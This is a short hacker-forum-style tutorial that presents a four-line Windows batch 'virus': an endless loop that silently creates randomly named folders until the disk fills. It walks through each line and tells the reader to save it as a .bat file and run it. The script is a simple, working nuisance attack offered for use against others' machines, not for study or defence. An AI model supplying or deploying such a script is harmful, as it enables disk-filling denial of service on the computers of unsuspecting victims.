
Hello hackers, the batch code will be very helpful to you. Virus code that is simple and effective.
As usual open notebook.
Copy this code into Notepad.
@echo off
:top
md %random%
goto top
@ Echo off makes it so that seems to be a blank screen, but in reality they do hundreds of folders.
md % random% is command that creating folders with random names.
goto top - return to label: top, infinite loop
Save the bat file (eg: folderscreate.bat).
Thats it, if you double click the file it will create a folder in the batch file the world ends.